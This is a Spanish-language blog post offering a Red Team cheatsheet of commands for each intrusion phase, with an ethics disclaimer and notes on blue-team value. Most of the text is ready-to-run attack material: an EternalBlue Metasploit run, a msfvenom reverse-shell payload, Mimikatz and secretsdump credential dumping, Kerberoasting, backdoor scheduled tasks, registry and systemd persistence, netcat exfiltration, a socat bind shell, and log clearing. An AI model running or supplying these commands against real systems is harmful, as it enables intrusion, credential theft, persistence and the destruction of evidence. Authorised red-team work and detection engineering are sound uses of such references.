Introducción
Los ejercicios de Red Team permiten evaluar la resiliencia operativa y técnica de una organización frente a adversarios que emplean técnicas realistas y persistentes. A diferencia de un pentest puntual, un Red Team simula campañas complejas que cubren todo el ciclo de intrusión: desde el reconocimiento inicial hasta la persistencia y exfiltración.
Este cheatsheet recopila comandos prácticos y patrones de uso para cada fase del ciclo ofensivo, diseñado como referencia rápida para profesionales en entornos controlados y con autorización formal.
⚠️ Aviso ético: todo el material descrito en este post debe emplearse exclusivamente en escenarios autorizados (contratos, ejercicios internos o laboratorios). El uso no autorizado de estas técnicas es ilegal y dañino.
Desarrollo técnico
A continuación se presentan comandos y ejemplos organizados por fase. Los snippets son representativos: adáptalos al contexto del ejercicio y respeta las políticas de alcance y autorización.
1. Reconocimiento / información pública
Recolección de información disponible públicamente para entender la superficie de ataque.
whois example.com
dig +short example.com
dig ANY example.com @8.8.8.8
nslookup -type=mx example.com 8.8.8.8
curl '<https://crt.sh/?q=%25.example.com>' -s
theHarvester -d example.com -l 500 -b all
gobuster dns -d example.com -w subdomains.txt -t 50
recon-ng --modules
2. Descubrimiento de puertos y servicios
Inventariado de servicios expuestos y detección de versiones.
nmap -sC -sV -oA scan/example 10.0.0.0/24
nmap -T4 -A -p- --min-rate=1000 -oA fastscan target.com
masscan -p1-65535 --rate=10000 10.0.0.0/8 -oG masscan.txt
smbclient -L \\TARGET -U ''
enum4linux -a TARGET
smbmap -H target -u user -p pass
rpcclient -U '' TARGET -c 'enumdomusers'
ldapsearch -x -H ldap://target -b 'dc=corp,dc=local' '(objectClass=*)'
3. Fuerza bruta y cracking de credenciales
Técnicas para validar contraseñas débiles y extraer hashes.
hydra -l administrator -P passwords.txt smb://TARGET
medusa -h target -u admin -P passlist -M ssh
hashcat -m 1000 hashes.txt rockyou.txt --force
john --wordlist=rockyou.txt --format=NT hashes.txt
impacket-secretsdump domain/creds@DC
4. Explotación y payloads
Uso de exploits conocidos y generación de payloads personalizados.
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target
run
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f exe > shell.exe
searchsploit MS17-010
sqlmap -u '<https://target/page?id=1>' --batch --dump
5. Post-explotación (Windows y Active Directory)
Escalada de privilegios, recolección de credenciales y mapeo de relaciones de confianza.
# Mimikatz (interactivo)
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
# Impacket / ejecución remota
psexec.py -hashes LM:NTLM domain/user@target
wmiexec.py user:pass@target
secretsdump.py domain/Administrator@DC -outputfile:creds
# Recolección y análisis de grafos
SharpHound.exe -c All
# Analizar en BloodHound UI
# Kerberos attacks
Rubeus.exe kerberoast
Invoke-Kerberoast -Verbose
6. Movimiento lateral y ejecución remota
Técnicas para pivotar y ejecutar código en hosts remotos.
crackmapexec smb 10.0.0.0/24 -u users -p 'P@ssw0rd' --shares
schtasks /create /s TARGET /u DOMAIN\\Admin /p 'Pass' /tn 'Updater' /tr 'C:\\Windows\\Temp\\backdoor.exe' /sc once /st 00:00
sc \\\\TARGET create MySrv binPath= "C:\\payload.exe" start= auto
Enter-PSSession -ComputerName target -Credential (Get-Credential)
7. Persistencia
Mecanismos comunes para mantener acceso tras reinicios o auditorías.
# Registry autorun (Windows)
reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater /d "C:\\windows\\temp\\updater.exe" /f
# Tarea programada
schtasks /create /sc daily /tn 'Updater' /tr 'C:\\windows\\temp\\upd.exe' /st 12:00
# systemd (Linux)
cat > /etc/systemd/system/backdoor.service <<EOF
[Unit]
Description=back
[Service]
ExecStart=/usr/bin/python3 /opt/backdoor.py
Restart=always
EOF
systemctl enable --now backdoor.service
8. Exfiltración y herramientas de red
Técnicas y utilidades para extraer información con discreción.
nc -lvnp 4444
nc target 80 < exfil.zip
socat TCP-LISTEN:4444,fork EXEC:/bin/bash
curl -o /tmp/file <http://10.0.0.5/file>
wget <http://10.0.0.5/file> -O /tmp/file
tcpdump -i eth0 -w traffic.pcap
tshark -r traffic.pcap -Y 'http'
9. Web & fuzzing
Descubrimiento de directorios y recursos web.
ffuf -u <https://target/FUZZ> -w wordlist.txt -t 50 -mc 200,301
gobuster dir -u <https://target> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# Burp Suite: Proxy, Repeater, Intruder y extensiones
10. Limpieza y OPSEC (básico)
Acciones de remediación (únicamente en ejercicios autorizados) y minimización de huella.
# Ejemplo: limpiar eventos Windows (altamente detectable; usar solo en laboratorio autorizado)
wevtutil cl System
# Eliminar persistencias, restaurar cambios de configuración y retirar herramientas
Aplicaciones / Impacto
- Red Teams : acelera la ejecución de campañas controladas y mejora la reproducibilidad de técnicas durante ejercicios.
- Blue Teams : al conocer comandos y patrones ofensivos, pueden mejorar reglas de detección, alertas y playbooks de respuesta.
- Auditores y gestores de riesgo : facilitan la priorización de controles técnicos y la evaluación del impacto real de vectores explotables.
Integrar estas operaciones con marcos como MITRE ATT&CK permite mapear técnicas a controles detectivos y preventivos y obtener métricas accionables de madurez.
Conclusión
El uso responsable y autorizado de técnicas ofensivas es una palanca poderosa para mejorar la postura defensiva de una organización. Este cheatsheet ofrece una referencia práctica para diseñar escenarios, validar controles y cerrar brechas. Recomendación: automatizar recolección de telemetría durante los ejercicios y correlacionarla con detecciones para cerrar brechas opérationales.
Fuentes
- MITRE ATT&CK — Framework de tácticas y técnicas.
- NIST SP 800-115 — Technical Guide to Information Security Testing and Assessment .
- OWASP Testing Guide.
- Cheatsheet: Comandos útiles para Red Team. fileciteturn7file4